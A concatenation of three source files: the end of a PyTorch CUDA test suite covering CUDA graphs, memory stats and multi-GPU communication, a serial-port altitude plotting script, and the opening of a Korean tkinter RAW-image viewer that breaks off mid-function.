((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
# Resets RNC states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
altitude_plot.py
|
#!/usr/bin/env python3
'''
Dependencies: numpy, matplotlib, https://github.com/simondlevy/RealtimePlotter
Copyright (C) 2021 Simon D. Levy
MIT License
'''
import serial
from realtime_plot import RealtimePlotter
import numpy as np
from threading import Thread
from sys import argv, stdout
# Change these to suit your needs
PORT = '/dev/ttyACM0'
BAUD = 115200
NTICKS = 10
class SerialPlotter(RealtimePlotter):
def __init__(self):
ranges = [(-1,5), (-5,+5), (-5,+5)]
RealtimePlotter.__init__(self,
ranges,
show_yvals=True,
ylabels=['Altitude', 'Variometer', 'FirstDiff'],
window_name='Altitude Estimation',
styles=['b', 'r', 'g'])
self.tick = 0
self.vals = None
def getValues(self):
return self.vals
def _update(port, plotter):
while True:
plotter.vals = [float(s) for s in port.readline().decode()[:-1].split()]
plotter.tick += 1
if __name__ == '__main__':
port = argv[1] if len(argv) > 1 else PORT
try:
port = serial.Serial(port, BAUD)
except serial.SerialException:
print('Unable to open device on port %s' % PORT)
exit(1)
plotter = SerialPlotter()
thread = Thread(target=_update, args = (port, plotter))
thread.daemon = True
thread.start()
plotter.start()
|
Day05-00-2.py
|
## 영상 처리 및 데이터 분석 툴
## (1) 대용량 영상을 128x128로 미리보기
## 데이터 처리는 그대로이며 display() 함수에서만 128x128로....
## (2) 스레드로 디스플레이
## (3) 상태바에 파일명과 크기를 명시
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
import math
## 함수 선언부
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH, status
fsize = os.path.getsize(fname) # 파일 크기 확인
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'rb') # 파일 열기(바이너리 모드)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH, status
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
inImage.clear(); outImage.clear()
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
# 상태바에 파일 정보 출력
statusStr = '파일명:' + filename + "\n파일크기:" + str(inW) + "x" + str(inH)
status.configure(text=statusStr)
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH, VIEW_X, VIEW_Y
# 출력할 영상에서 STEP을 구한다.
VIEW_X, VIEW_Y = 128, 128
if VIEW_X > outW or VIEW_Y > outH : #결과 영상이 128 미만이면
VIEW_X = outW; VIEW_Y = outH
step = 1
else :
step = int(outW / VIEW_X)
print(outW, VIEW_X, step)
# 기존에 캐버스 있으면 뜯어내기.
if canvas != None :
canvas.destroy()
# 화면 준비 (고정됨)
window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
canvas.create_image((VIEW_X/2, VIEW_Y/2), image=paper, state='normal')
# 화면에 출력
def putPixel():
for i in range(0,outH, step) :
for k in range(0,outW, step) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data), (int(k/step),int(i/step)))
threading.Thread(target=putPixel).start()
canvas.pack(expand=1, anchor=CENTER)
def equal() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
